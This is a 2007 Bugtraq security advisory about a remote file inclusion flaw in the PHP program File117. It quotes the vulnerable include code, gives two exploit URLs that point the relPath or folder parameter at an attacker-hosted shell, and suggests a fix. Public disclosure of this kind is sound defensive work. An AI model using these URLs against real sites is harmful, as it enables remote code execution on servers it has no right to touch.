| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 22 Apr 2007 18:50:14 -0000
From: InyeXion@...il.com
To: bugtraq@...urityfocus.com
Subject: File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File117 Remote File Inclusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Software .: File117
Download..: http://www.sinato.com/jmuffin/upload/file117.zip
Risk ..............: high
Found by ..........: InyeXion
Contact ...........: InyeXion[at]gmail.com
Web .............: Www.InyeXion.com.ar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/html/php/detail.php
Vulnerable Code:
<?php
include_once("phpInterface.php");
$$cmname=$cm;
include($relPath.$folder."/".$templatename);
?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:
http://[target]/html/php/detail.php?relPath=[shell]?
http://[target]/html/php/detail.php?folder=[shell]?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fixed bug:
if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){
die("denied access"); }
AND
if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){
die("denied access"); }
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Powered by blists - more mailing lists